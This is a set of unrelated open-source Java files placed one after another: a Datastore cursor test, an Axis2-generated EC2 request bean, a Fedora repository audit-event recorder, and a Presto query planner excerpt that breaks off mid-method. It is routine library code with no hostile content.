"name-01").build()).build(); Entity entity2 = Entity.newBuilder(Key.newBuilder(PROJECT_ID, KIND1, "name-02").build()).build(); Entity entity3 = Entity.newBuilder(Key.newBuilder(PROJECT_ID, KIND1, "name-03").build()).build(); datastore.put(entity1, entity2, entity3); QueryResults<Entity> run1 = datastore.run(Query.newEntityQueryBuilder().setKind(KIND1).build()); run1.next(); Cursor cursor1 = run1.getCursorAfter(); assertNotNull(cursor1); QueryResults<Entity> run2 = datastore.run(Query.newEntityQueryBuilder().setKind(KIND1).setStartCursor(cursor1).build()); Cursor cursor2 = run2.getCursorAfter(); assertNotNull(cursor2); assertEquals(cursor2, cursor1); datastore.delete(entity1.getKey(), entity2.getKey(), entity3.getKey()); } }
// Licensed to the Apache Software Foundation (ASF) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The ASF licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. /** * DeregisterImage.java * * This file was auto-generated from WSDL * by the Apache Axis2 version: 1.5.6 Built on : Aug 30, 2011 (10:01:01 CEST) */ package com.amazon.ec2; /** * DeregisterImage bean class */ public class DeregisterImage implements org.apache.axis2.databinding.ADBBean{ public static final javax.xml.namespace.QName MY_QNAME = new javax.xml.namespace.QName( "http://ec2.amazonaws.com/doc/2012-08-15/", "DeregisterImage", "ns1"); private static java.lang.String generatePrefix(java.lang.String namespace) { if(namespace.equals("http://ec2.amazonaws.com/doc/2012-08-15/")){ return "ns1"; } return org.apache.axis2.databinding.utils.BeanUtil.getUniquePrefix(); } /** * field for DeregisterImage */ protected com.amazon.ec2.DeregisterImageType localDeregisterImage ; /** * Auto generated getter method * @return com.amazon.ec2.DeregisterImageType */ public com.amazon.ec2.DeregisterImageType getDeregisterImage(){ return localDeregisterImage; } /** * Auto generated setter method * @param param DeregisterImage */ public void setDeregisterImage(com.amazon.ec2.DeregisterImageType param){ this.localDeregisterImage=param; } /** * isReaderMTOMAware * @return true if the reader supports MTOM */ public static boolean isReaderMTOMAware(javax.xml.stream.XMLStreamReader reader) { boolean isReaderMTOMAware = false; try{ isReaderMTOMAware = java.lang.Boolean.TRUE.equals(reader.getProperty(org.apache.axiom.om.OMConstants.IS_DATA_HANDLERS_AWARE)); }catch(java.lang.IllegalArgumentException e){ isReaderMTOMAware = false; } return isReaderMTOMAware; } /** * * @param parentQName * @param factory * @return org.apache.axiom.om.OMElement */ public org.apache.axiom.om.OMElement getOMElement ( final javax.xml.namespace.QName parentQName, final org.apache.axiom.om.OMFactory factory) throws org.apache.axis2.databinding.ADBException{ org.apache.axiom.om.OMDataSource dataSource = new org.apache.axis2.databinding.ADBDataSource(this,MY_QNAME){ public void serialize(org.apache.axis2.databinding.utils.writer.MTOMAwareXMLStreamWriter xmlWriter) throws javax.xml.stream.XMLStreamException { DeregisterImage.this.serialize(MY_QNAME,factory,xmlWriter); } }; return new org.apache.axiom.om.impl.llom.OMSourcedElementImpl( MY_QNAME,factory,dataSource); } public void serialize(final javax.xml.namespace.QName parentQName, final org.apache.axiom.om.OMFactory factory, org.apache.axis2.databinding.utils.writer.MTOMAwareXMLStreamWriter xmlWriter) throws javax.xml.stream.XMLStreamException, org.apache.axis2.databinding.ADBException{ serialize(parentQName,factory,xmlWriter,false); } public void serialize(final javax.xml.namespace.QName parentQName, final org.apache.axiom.om.OMFactory factory, org.apache.axis2.databinding.utils.writer.MTOMAwareXMLStreamWriter xmlWriter, boolean serializeType) throws javax.xml.stream.XMLStreamException, org.apache.axis2.databinding.ADBException{ //We can safely assume an element has only one type associated with it if (localDeregisterImage==null){ throw new org.apache.axis2.databinding.ADBException("Property cannot be null!"); } localDeregisterImage.serialize(MY_QNAME,factory,xmlWriter); } /** * Util method to write an attribute with the ns prefix */ private void writeAttribute(java.lang.String prefix,java.lang.String namespace,java.lang.String attName, java.lang.String attValue,javax.xml.stream.XMLStreamWriter xmlWriter) throws javax.xml.stream.XMLStreamException{ if (xmlWriter.getPrefix(namespace) == null) { xmlWriter.writeNamespace(prefix, namespace); xmlWriter.setPrefix(prefix, namespace); } xmlWriter.writeAttribute(namespace,attName,attValue); } /** * Util method to write an attribute without the ns prefix */ private void writeAttribute(java.lang.String namespace,java.lang.String attName, java.lang.String attValue,javax.xml.stream.XMLStreamWriter xmlWriter) throws javax.xml.stream.XMLStreamException{ if (namespace.equals("")) { xmlWriter.writeAttribute(attName,attValue); } else { registerPrefix(xmlWriter, namespace); xmlWriter.writeAttribute(namespace,attName,attValue); } } /** * Util method to write an attribute without the ns prefix */ private void writeQNameAttribute(java.lang.String namespace, java.lang.String attName, javax.xml.namespace.QName qname, javax.xml.stream.XMLStreamWriter xmlWriter) throws javax.xml.stream.XMLStreamException { java.lang.String attributeNamespace = qname.getNamespaceURI(); java.lang.String attributePrefix = xmlWriter.getPrefix(attributeNamespace); if (attributePrefix == null) { attributePrefix = registerPrefix(xmlWriter, attributeNamespace); } java.lang.String attributeValue; if (attributePrefix.trim().length() > 0) { attributeValue = attributePrefix + ":" + qname.getLocalPart(); } else { attributeValue = qname.getLocalPart(); } if (namespace.equals("")) { xmlWriter.writeAttribute(attName, attributeValue); } else { registerPrefix(xmlWriter, namespace); xmlWriter.writeAttribute(namespace, attName, attributeValue); } } /** * method to handle Qnames */ private void writeQName(javax.xml.namespace.QName qname, javax.xml.stream.XMLStreamWriter xmlWriter) throws javax.xml.stream.XMLStreamException { java.lang.String namespaceURI = qname.getNamespaceURI(); if (namespaceURI != null) { java.lang.String prefix = xmlWriter.getPrefix(namespaceURI); if (prefix == null) { prefix = generatePrefix(namespaceURI); xmlWriter.writeNamespace(prefix, namespaceURI); xmlWriter.setPrefix(prefix,namespaceURI); } if (prefix.trim().length() > 0){ xmlWriter.writeCharacters(prefix + ":" + org.apache.axis2.databinding.utils.ConverterUtil.convertToString(qname)); } else { // i.e this is the default namespace xmlWriter.writeCharacters(org.apache.axis2.databinding.utils.ConverterUtil.convertToString(qname)); } } else { xmlWriter.writeCharacters(org.apache.axis2.databinding.utils.ConverterUtil.convertToString(qname)); } } private void writeQNames(javax.xml.namespace.QName[] qnames, javax.xml.stream.XMLStreamWriter xmlWriter) throws javax.xml.stream.XMLStreamException { if (qnames != null) { // we have to store this data until last moment since it is not possible to write any // namespace data after writing the charactor data java.lang.StringBuffer stringToWrite = new java.lang.StringBuffer(); java.lang.String namespaceURI = null; java.lang.String prefix = null; for (int i = 0; i < qnames.length; i++) { if (i > 0) { stringToWrite.append(" "); } namespaceURI = qnames[i].getNamespaceURI(); if (namespaceURI != null) { prefix = xmlWriter.getPrefix(namespaceURI); if ((prefix == null) || (prefix.length() == 0)) { prefix = generatePrefix(namespaceURI); xmlWriter.writeNamespace(prefix, namespaceURI); xmlWriter.setPrefix(prefix,namespaceURI); } if (prefix.trim().length() > 0){ stringToWrite.append(prefix).append(":").append(org.apache.axis2.databinding.utils.ConverterUtil.convertToString(qnames[i])); } else { stringToWrite.append(org.apache.axis2.databinding.utils.ConverterUtil.convertToString(qnames[i])); } } else { stringToWrite.append(org.apache.axis2.databinding.utils.ConverterUtil.convertToString(qnames[i])); } } xmlWriter.writeCharacters(stringToWrite.toString()); } } /** * Register a namespace prefix */ private java.lang.String registerPrefix(javax.xml.stream.XMLStreamWriter xmlWriter, java.lang.String namespace) throws javax.xml.stream.XMLStreamException { java.lang.String prefix = xmlWriter.getPrefix(namespace); if (prefix == null) { prefix = generatePrefix(namespace); while (xmlWriter.getNamespaceContext().getNamespaceURI(prefix) != null) { prefix = org.apache.axis2.databinding.utils.BeanUtil.getUniquePrefix(); } xmlWriter.writeNamespace(prefix, namespace); xmlWriter.setPrefix(prefix, namespace); } return prefix; } /** * databinding method to get an XML representation of this object * */ public javax.xml.stream.XMLStreamReader getPullParser(javax.xml.namespace.QName qName) throws org.apache.axis2.databinding.ADBException{ //We can safely assume an element has only one type associated with it return localDeregisterImage.getPullParser(MY_QNAME); } /** * Factory class that keeps the parse method */ public static class Factory{ /** * static method to create the object * Precondition: If this object is an element, the current or next start element starts this object and any intervening reader events are ignorable * If this object is not an element, it is a complex type and the reader is at the event just after the outer start element * Postcondition: If this object is an element, the reader is positioned at its end element * If this object is a complex type, the reader is positioned at the end element of its outer element */ public static DeregisterImage parse(javax.xml.stream.XMLStreamReader reader) throws java.lang.Exception{ DeregisterImage object = new DeregisterImage(); int event; java.lang.String nillableValue = null; java.lang.String prefix =""; java.lang.String namespaceuri =""; try { while (!reader.isStartElement() && !reader.isEndElement()) reader.next(); // Note all attributes that were handled. Used to differ normal attributes // from anyAttributes. java.util.Vector handledAttributes = new java.util.Vector(); while(!reader.isEndElement()) { if (reader.isStartElement() ){ if (reader.isStartElement() && new javax.xml.namespace.QName("http://ec2.amazonaws.com/doc/2012-08-15/","DeregisterImage").equals(reader.getName())){ object.setDeregisterImage(com.amazon.ec2.DeregisterImageType.Factory.parse(reader)); } // End of if for expected property start element else{ // A start element we are not expecting indicates an invalid parameter was passed throw new org.apache.axis2.databinding.ADBException("Unexpected subelement " + reader.getLocalName()); } } else { reader.next(); } } // end of while loop } catch (javax.xml.stream.XMLStreamException e) { throw new java.lang.Exception(e); } return object; } }//end of factory class }
/** * Copyright 2015 DuraSpace, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.fcrepo.audit; import static com.hp.hpl.jena.datatypes.xsd.XSDDatatype.XSDdateTime; import static com.hp.hpl.jena.datatypes.xsd.XSDDatatype.XSDstring; import static com.hp.hpl.jena.rdf.model.ModelFactory.createDefaultModel; import static com.hp.hpl.jena.rdf.model.ResourceFactory.createProperty; import static com.hp.hpl.jena.rdf.model.ResourceFactory.createResource; import static com.hp.hpl.jena.rdf.model.ResourceFactory.createTypedLiteral; import static org.modeshape.jcr.api.JcrConstants.JCR_CONTENT; import static org.slf4j.LoggerFactory.getLogger; import java.io.IOException; import java.net.URI; import java.net.URISyntaxException; import java.text.DateFormat; import java.text.SimpleDateFormat; import java.util.Date; import java.util.Iterator; import java.util.Set; import java.util.TimeZone; import javax.annotation.PostConstruct; import javax.annotation.PreDestroy; import javax.inject.Inject; import javax.jcr.RepositoryException; import org.fcrepo.kernel.impl.rdf.impl.PrefixingIdentifierTranslator; import org.fcrepo.kernel.exception.RepositoryRuntimeException; import org.fcrepo.kernel.identifiers.PidMinter; import org.fcrepo.kernel.models.FedoraResource; import org.fcrepo.kernel.observer.FedoraEvent; import org.fcrepo.kernel.services.ContainerService; import org.fcrepo.kernel.utils.iterators.RdfStream; import org.fcrepo.mint.UUIDPathMinter; import org.modeshape.jcr.api.JcrTools; import org.modeshape.jcr.api.Repository; import org.modeshape.jcr.api.Session; import org.slf4j.Logger; import com.fasterxml.jackson.databind.JsonNode; import com.fasterxml.jackson.databind.ObjectMapper; import com.hp.hpl.jena.rdf.model.Model; import com.hp.hpl.jena.rdf.model.RDFNode; import com.hp.hpl.jena.rdf.model.Resource; import com.hp.hpl.jena.rdf.model.ResourceFactory; import com.hp.hpl.jena.rdf.model.Statement; import com.google.common.annotations.VisibleForTesting; import com.google.common.base.Joiner; import com.google.common.eventbus.EventBus; import com.google.common.eventbus.Subscribe; /** * Auditor implementation that creates audit nodes in the repository. * @author mohideen * @author escowles * @since 2015-04-15 */ public class InternalAuditor implements Auditor { /** * Logger for this class. */ private static final Logger LOGGER = getLogger(InternalAuditor.class); private static final String AUDIT_CONTAINER = "fcrepo.audit.container"; private static String AUDIT_CONTAINER_LOCATION; @Inject private EventBus eventBus; @Inject private Repository repository; @Inject private ContainerService containerService; private Session session; private static JcrTools jcrTools = new JcrTools(true); private static final PidMinter pidMinter = new UUIDPathMinter(); /** * Register with the EventBus to receive events. * @throws RepositoryRuntimeException */ @PostConstruct public void register() throws RepositoryRuntimeException { try { AUDIT_CONTAINER_LOCATION = System.getProperty(AUDIT_CONTAINER); if (AUDIT_CONTAINER_LOCATION != null) { LOGGER.info("Initializing: {}", this.getClass().getCanonicalName()); eventBus.register(this); if (!AUDIT_CONTAINER_LOCATION.startsWith("/")) { AUDIT_CONTAINER_LOCATION = "/" + AUDIT_CONTAINER_LOCATION; } if (AUDIT_CONTAINER_LOCATION.endsWith("/")) { AUDIT_CONTAINER_LOCATION = AUDIT_CONTAINER_LOCATION.substring(0, AUDIT_CONTAINER_LOCATION.length() - 2); } session = repository.login(); containerService.findOrCreate(session, AUDIT_CONTAINER_LOCATION); LOGGER.debug("Registering audit CND"); jcrTools.registerNodeTypes(session, "audit.cnd"); session.save(); } else { LOGGER.warn("Cannot Initialize: {}", this.getClass().getCanonicalName()); LOGGER.warn("System property not found: " + AUDIT_CONTAINER); } } catch (RepositoryException e) { throw new RepositoryRuntimeException(e); } } /** * Fedora internal events are received and processed by this method. * * @param event * The {@link FedoraEvent} to record. * @throws RepositoryRuntimeException */ @Subscribe public void recordEvent(final FedoraEvent event) throws RepositoryRuntimeException, IOException { LOGGER.debug("Event detected: {} {}", event.getUserID(), event.getPath()); boolean isParentNodeLastModifiedEvent = false; final String eventType = AuditUtils.getEventURIs(event.getTypes()); final Set<String> properties = event.getProperties(); if (eventType.contains(AuditProperties.PROPERTY_CHANGED)) { isParentNodeLastModifiedEvent = true; final Iterator<String> propertiesIter = properties.iterator(); String property; while (properties.iterator().hasNext()) { property = propertiesIter.next(); if (!property.equals(AuditProperties.LAST_MODIFIED) && !property.equals(AuditProperties.LAST_MODIFIED_BY)) { /* adding/removing a file updates the lastModified property of the parent container, so ignore updates when only lastModified is changed */ isParentNodeLastModifiedEvent = false; break; } } } if (!event.getPath().startsWith(AUDIT_CONTAINER_LOCATION) && !isParentNodeLastModifiedEvent) { createAuditNode(event); } } /** * Close external connections */ @PreDestroy public void releaseConnections() { LOGGER.debug("Tearing down: {}", this.getClass().getCanonicalName()); eventBus.unregister(this); } // JCR property name, not URI private static final String PREMIS_OBJ = "premis:hasEventRelatedObject"; /** * Creates a node for the audit event under the configured container. * * @param event * @throws RepositoryRuntimeException */ public void createAuditNode(final FedoraEvent event) throws RepositoryRuntimeException, IOException { try { final String uuid = pidMinter.mintPid(); final String userData = event.getUserData(); final ObjectMapper mapper = new ObjectMapper(); final JsonNode json = mapper.readTree(userData); final String userAgent = json.get("userAgent").asText(); String baseURL = json.get("baseURL").asText(); if (baseURL.endsWith("/")) { baseURL = baseURL.substring(0, baseURL.length() - 1); } String path = event.getPath(); if ( path.endsWith("/" + JCR_CONTENT) ) { path = path.replaceAll("/" + JCR_CONTENT,""); } final String uri = baseURL + path; final Long timestamp = event.getDate(); final DateFormat df = new SimpleDateFormat("yyyy-MM-dd'T'HH:mm:ss'Z'"); df.setTimeZone(TimeZone.getTimeZone("UTC")); final String eventDate = df.format(new Date(timestamp)); final String userID = event.getUserID(); final String eventType = AuditUtils.getEventURIs(event.getTypes()); final String properties = Joiner.on(',').join(event.getProperties()); final String auditEventType = AuditUtils.getAuditEventType(eventType, properties); final FedoraResource auditResource = containerService.findOrCreate(session, AUDIT_CONTAINER_LOCATION + "/" + uuid); LOGGER.debug("Audit node {} created for event.", uuid); final Model m = createDefaultModel(); final String auditResourceURI = baseURL + AUDIT_CONTAINER_LOCATION + "/" + uuid; final Resource s = createResource(auditResourceURI); m.add(createStatement(s, AuditProperties.RDF_TYPE, createResource(AuditProperties.INTERNAL_EVENT))); m.add(createStatement(s, AuditProperties.RDF_TYPE, createResource(AuditProperties.PREMIS_EVENT))); m.add(createStatement(s, AuditProperties.RDF_TYPE, createResource(AuditProperties.PROV_EVENT))); m.add(createStatement(s, AuditProperties.PREMIS_TIME, createTypedLiteral(eventDate, XSDdateTime))); m.add(createStatement(s, AuditProperties.PREMIS_AGENT, createTypedLiteral(userID, XSDstring))); m.add(createStatement(s, AuditProperties.PREMIS_AGENT, createTypedLiteral(userAgent, XSDstring))); if (auditEventType != null) { m.add(createStatement(s, AuditProperties.PREMIS_TYPE, createResource(auditEventType))); } auditResource.replaceProperties(new PrefixingIdentifierTranslator(session, baseURL + "/"), m, new RdfStream()); // set link to impacted object using a URI property to preserve the link if it's deleted try { auditResource.setURIProperty(PREMIS_OBJ, new URI(uri)); } catch (URISyntaxException e) { LOGGER.warn("Error creating URI for repository resource {}", uri); } session.save(); } catch (RepositoryException e) { throw new RepositoryRuntimeException(e); } } @VisibleForTesting protected Statement createStatement(final Resource subject, final String property, final RDFNode object) { return ResourceFactory.createStatement(subject, createProperty(property), object); } }
/* * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.facebook.presto.sql.planner; import com.facebook.presto.Session; import com.facebook.presto.SystemSessionProperties; import com.facebook.presto.common.predicate.TupleDomain; import com.facebook.presto.common.type.ArrayType; import com.facebook.presto.common.type.MapType; import com.facebook.presto.common.type.RowType; import com.facebook.presto.common.type.Type; import com.facebook.presto.metadata.Metadata; import com.facebook.presto.spi.ColumnHandle; import com.facebook.presto.spi.TableHandle; import com.facebook.presto.spi.plan.AggregationNode; import com.facebook.presto.spi.plan.Assignments; import com.facebook.presto.spi.plan.ExceptNode; import com.facebook.presto.spi.plan.FilterNode; import com.facebook.presto.spi.plan.IntersectNode; import com.facebook.presto.spi.plan.PlanNode; import com.facebook.presto.spi.plan.PlanNodeIdAllocator; import com.facebook.presto.spi.plan.ProjectNode; import com.facebook.presto.spi.plan.TableScanNode; import com.facebook.presto.spi.plan.UnionNode; import com.facebook.presto.spi.plan.ValuesNode; import com.facebook.presto.spi.relation.RowExpression; import com.facebook.presto.spi.relation.VariableReferenceExpression; import com.facebook.presto.sql.ExpressionUtils; import com.facebook.presto.sql.analyzer.Analysis; import com.facebook.presto.sql.analyzer.Field; import com.facebook.presto.sql.analyzer.RelationId; import com.facebook.presto.sql.analyzer.RelationType; import com.facebook.presto.sql.analyzer.Scope; import com.facebook.presto.sql.planner.optimizations.JoinNodeUtils; import com.facebook.presto.sql.planner.optimizations.SampleNodeUtil; import com.facebook.presto.sql.planner.plan.JoinNode; import com.facebook.presto.sql.planner.plan.LateralJoinNode; import com.facebook.presto.sql.planner.plan.SampleNode; import com.facebook.presto.sql.planner.plan.UnnestNode; import com.facebook.presto.sql.tree.AliasedRelation; import com.facebook.presto.sql.tree.Cast; import com.facebook.presto.sql.tree.CoalesceExpression; import com.facebook.presto.sql.tree.ComparisonExpression; import com.facebook.presto.sql.tree.DefaultTraversalVisitor; import com.facebook.presto.sql.tree.Except; import com.facebook.presto.sql.tree.Expression; import com.facebook.presto.sql.tree.ExpressionTreeRewriter; import com.facebook.presto.sql.tree.Identifier; import com.facebook.presto.sql.tree.InPredicate; import com.facebook.presto.sql.tree.Intersect; import com.facebook.presto.sql.tree.IsNotNullPredicate; import com.facebook.presto.sql.tree.Join; import com.facebook.presto.sql.tree.JoinUsing; import com.facebook.presto.sql.tree.LambdaArgumentDeclaration; import com.facebook.presto.sql.tree.Lateral; import com.facebook.presto.sql.tree.NodeRef; import com.facebook.presto.sql.tree.QualifiedName; import com.facebook.presto.sql.tree.Query; import com.facebook.presto.sql.tree.QuerySpecification; import com.facebook.presto.sql.tree.Relation; import com.facebook.presto.sql.tree.Row; import com.facebook.presto.sql.tree.SampledRelation; import com.facebook.presto.sql.tree.SetOperation; import com.facebook.presto.sql.tree.SymbolReference; import com.facebook.presto.sql.tree.Table; import com.facebook.presto.sql.tree.TableSubquery; import com.facebook.presto.sql.tree.Union; import com.facebook.presto.sql.tree.Unnest; import com.facebook.presto.sql.tree.Values; import com.google.common.collect.ImmutableList; import com.google.common.collect.ImmutableListMultimap; import com.google.common.collect.ImmutableMap; import com.google.common.collect.Iterables; import com.google.common.collect.ListMultimap; import com.google.common.collect.UnmodifiableIterator; import java.util.ArrayList; import java.util.HashMap; import java.util.Iterator; import java.util.LinkedHashMap; import java.util.List; import java.util.Map; import java.util.Optional; import java.util.Set; import static com.facebook.presto.spi.plan.AggregationNode.singleGroupingSet; import static com.facebook.presto.spi.plan.ProjectNode.Locality.LOCAL; import static com.facebook.presto.sql.analyzer.ExpressionTreeUtils.isEqualComparisonExpression; import static com.facebook.presto.sql.analyzer.SemanticExceptions.notSupportedException; import static com.facebook.presto.sql.planner.plan.AssignmentUtils.identitiesAsSymbolReferences; import static com.facebook.presto.sql.relational.OriginalExpressionUtils.asSymbolReference; import static com.facebook.presto.sql.relational.OriginalExpressionUtils.castToRowExpression; import static com.facebook.presto.sql.tree.Join.Type.INNER; import static com.google.common.base.Preconditions.checkArgument; import static com.google.common.base.Preconditions.checkState; import static com.google.common.base.Verify.verify; import static com.google.common.collect.ImmutableList.toImmutableList; import static java.util.Objects.requireNonNull; class RelationPlanner extends DefaultTraversalVisitor<RelationPlan, Void> { private final Analysis analysis; private final PlanVariableAllocator variableAllocator; private final PlanNodeIdAllocator idAllocator; private final Map<NodeRef<LambdaArgumentDeclaration>, VariableReferenceExpression> lambdaDeclarationToVariableMap; private final Metadata metadata; private final Session session; private final SubqueryPlanner subqueryPlanner; RelationPlanner( Analysis analysis, PlanVariableAllocator variableAllocator, PlanNodeIdAllocator idAllocator, Map<NodeRef<LambdaArgumentDeclaration>, VariableReferenceExpression> lambdaDeclarationToVariableMap, Metadata metadata, Session session) { requireNonNull(analysis, "analysis is null"); requireNonNull(variableAllocator, "variableAllocator is null"); requireNonNull(idAllocator, "idAllocator is null"); requireNonNull(lambdaDeclarationToVariableMap, "lambdaDeclarationToVariableMap is null"); requireNonNull(metadata, "metadata is null"); requireNonNull(session, "session is null"); this.analysis = analysis; this.variableAllocator = variableAllocator; this.idAllocator = idAllocator; this.lambdaDeclarationToVariableMap = lambdaDeclarationToVariableMap; this.metadata = metadata; this.session = session; this.subqueryPlanner = new SubqueryPlanner(analysis, variableAllocator, idAllocator, lambdaDeclarationToVariableMap, metadata, session); } @Override protected RelationPlan visitTable(Table node, Void context) { Query namedQuery = analysis.getNamedQuery(node); Scope scope = analysis.getScope(node); if (namedQuery != null) { RelationPlan subPlan = process(namedQuery, null); // Add implicit coercions if view query produces types that don't match the declared output types // of the view (e.g., if the underlying tables referenced by the view changed) Type[] types = scope.getRelationType().getAllFields().stream().map(Field::getType).toArray(Type[]::new); RelationPlan withCoercions = addCoercions(subPlan, types); return new RelationPlan(withCoercions.getRoot(), scope, withCoercions.getFieldMappings()); } TableHandle handle = analysis.getTableHandle(node); ImmutableList.Builder<VariableReferenceExpression> outputVariablesBuilder = ImmutableList.builder(); ImmutableMap.Builder<VariableReferenceExpression, ColumnHandle> columns = ImmutableMap.builder(); for (Field field : scope.getRelationType().getAllFields()) { VariableReferenceExpression variable = variableAllocator.newVariable(field.getName().get(), field.getType()); outputVariablesBuilder.add(variable); columns.put(variable, analysis.getColumn(field)); } List<VariableReferenceExpression> outputVariables = outputVariablesBuilder.build(); PlanNode root = new TableScanNode(idAllocator.getNextId(), handle, outputVariables, columns.build(), TupleDomain.all(), TupleDomain.all()); return new RelationPlan(root, scope, outputVariables); } @Override protected RelationPlan visitAliasedRelation(AliasedRelation node, Void context) { RelationPlan subPlan = process(node.getRelation(), context); PlanNode root = subPlan.getRoot(); List<VariableReferenceExpression> mappings = subPlan.getFieldMappings(); if (node.getColumnNames() != null) { ImmutableList.Builder<VariableReferenceExpression> newMappings = ImmutableList.builder(); Assignments.Builder assignments = Assignments.builder(); // project only the visible columns from the underlying relation for (int i = 0; i < subPlan.getDescriptor().getAllFieldCount(); i++) { Field field = subPlan.getDescriptor().getFieldByIndex(i); if (!field.isHidden()) { VariableReferenceExpression aliasedColumn = variableAllocator.newVariable(field); assignments.put(aliasedColumn, castToRowExpression(asSymbolReference(subPlan.getFieldMappings().get(i)))); newMappings.add(aliasedColumn); } } root = new ProjectNode(idAllocator.getNextId(), subPlan.getRoot(), assignments.build(), LOCAL); mappings = newMappings.build(); } return new RelationPlan(root, analysis.getScope(node), mappings); } @Override protected RelationPlan visitSampledRelation(SampledRelation node, Void context) { RelationPlan subPlan = process(node.getRelation(), context); double ratio = analysis.getSampleRatio(node); PlanNode planNode = new SampleNode(idAllocator.getNextId(), subPlan.getRoot(), ratio, SampleNodeUtil.fromType(node.getType())); return new RelationPlan(planNode, analysis.getScope(node), subPlan.getFieldMappings()); } @Override protected RelationPlan visitJoin(Join node, Void context) { // TODO: translate the RIGHT join into a mirrored LEFT join when we refactor (@martint) RelationPlan leftPlan = process(node.getLeft(), context); Optional<Unnest> unnest = getUnnest(node.getRight()); if (unnest.isPresent()) { if (node.getType() != Join.Type.CROSS && node.getType() != Join.Type.IMPLICIT) { throw notSupportedException(unnest.get(), "UNNEST on other than the right side of CROSS JOIN"); } return planCrossJoinUnnest(leftPlan, node, unnest.get()); } Optional<Lateral> lateral = getLateral(node.getRight()); if (lateral.isPresent()) { if (node.getType() != Join.Type.CROSS && node.getType() != Join.Type.IMPLICIT) { throw notSupportedException(lateral.get(), "LATERAL on other than the right side of CROSS JOIN"); } return planLateralJoin(node, leftPlan, lateral.get()); } RelationPlan rightPlan = process(node.getRight(), context); if (node.getCriteria().isPresent() && node.getCriteria().get() instanceof JoinUsing) { return planJoinUsing(node, leftPlan, rightPlan); } PlanBuilder leftPlanBuilder = initializePlanBuilder(leftPlan); PlanBuilder rightPlanBuilder = initializePlanBuilder(rightPlan); // NOTE: variables must be in the same order as the outputDescriptor List<VariableReferenceExpression> outputs = ImmutableList.<VariableReferenceExpression>builder() .addAll(leftPlan.getFieldMappings()) .addAll(rightPlan.getFieldMappings()) .build(); ImmutableList.Builder<JoinNode.EquiJoinClause> equiClauses = ImmutableList.builder(); List<Expression> complexJoinExpressions = new ArrayList<>(); List<Expression> postInnerJoinConditions = new ArrayList<>(); if (node.getType() != Join.Type.CROSS && node.getType() != Join.Type.IMPLICIT) { Expression criteria = analysis.getJoinCriteria(node); RelationType left = analysis.getOutputDescriptor(node.getLeft()); RelationType right = analysis.getOutputDescriptor(node.getRight()); List<Expression> leftComparisonExpressions = new ArrayList<>(); List<Expression> rightComparisonExpressions = new ArrayList<>(); List<ComparisonExpression.Operator> joinConditionComparisonOperators = new ArrayList<>(); for (Expression conjunct : ExpressionUtils.extractConjuncts(criteria)) { conjunct = ExpressionUtils.normalize(conjunct); if (!isEqualComparisonExpression(conjunct) && node.getType() != INNER) { complexJoinExpressions.add(conjunct); continue; } Set<QualifiedName> dependencies = VariablesExtractor.extractNames(conjunct, analysis.getColumnReferences()); if (dependencies.stream().allMatch(left::canResolve) || dependencies.stream().allMatch(right::canResolve)) { // If the conjunct can be evaluated entirely with the inputs on either side of the join, add // it to the list complex expressions and let the optimizers figure out how to push it down later. complexJoinExpressions.add(conjunct); } else if (conjunct instanceof ComparisonExpression) { Expression firstExpression = ((ComparisonExpression) conjunct).getLeft(); Expression secondExpression = ((ComparisonExpression) conjunct).getRight(); ComparisonExpression.Operator comparisonOperator = ((ComparisonExpression) conjunct).getOperator(); Set<QualifiedName> firstDependencies = VariablesExtractor.extractNames(firstExpression, analysis.getColumnReferences()); Set<QualifiedName> secondDependencies = VariablesExtractor.extractNames(secondExpression, analysis.getColumnReferences()); if (firstDependencies.stream().allMatch(left::canResolve) && secondDependencies.stream().allMatch(right::canResolve)) { leftComparisonExpressions.add(firstExpression); rightComparisonExpressions.add(secondExpression); addNullFilters(complexJoinExpressions, node.getType(), firstExpression, secondExpression); joinConditionComparisonOperators.add(comparisonOperator); } else if (firstDependencies.stream().allMatch(right::canResolve) && secondDependencies.stream().allMatch(left::canResolve)) { leftComparisonExpressions.add(secondExpression); rightComparisonExpressions.add(firstExpression); addNullFilters(complexJoinExpressions, node.getType(), secondExpression, firstExpression); joinConditionComparisonOperators.add(comparisonOperator.flip()); } else { // the case when we mix variables from both left and right join side on either side of condition. complexJoinExpressions.add(conjunct); } } else { complexJoinExpressions.add(conjunct); } } leftPlanBuilder = subqueryPlanner.handleSubqueries(leftPlanBuilder, leftComparisonExpressions, node); rightPlanBuilder = subqueryPlanner.handleSubqueries(rightPlanBuilder, rightComparisonExpressions, node); // Add projections for join criteria leftPlanBuilder = leftPlanBuilder.appendProjections(leftComparisonExpressions, variableAllocator, idAllocator); rightPlanBuilder = rightPlanBuilder.appendProjections(rightComparisonExpressions, variableAllocator, idAllocator); for (int i = 0; i < leftComparisonExpressions.size(); i++) { if (joinConditionComparisonOperators.get(i) == ComparisonExpression.Operator.EQUAL) { VariableReferenceExpression leftVariable = leftPlanBuilder.translateToVariable(leftComparisonExpressions.get(i)); VariableReferenceExpression righVariable = rightPlanBuilder.translateToVariable(rightComparisonExpressions.get(i)); equiClauses.add(new JoinNode.EquiJoinClause(leftVariable, righVariable)); } else { Expression leftExpression = leftPlanBuilder.rewrite(leftComparisonExpressions.get(i)); Expression rightExpression = rightPlanBuilder.rewrite(rightComparisonExpressions.get(i)); postInnerJoinConditions.add(new ComparisonExpression(joinConditionComparisonOperators.get(i), leftExpression, rightExpression)); } } } PlanNode root = new JoinNode(idAllocator.getNextId(), JoinNodeUtils.typeConvert(node.getType()), 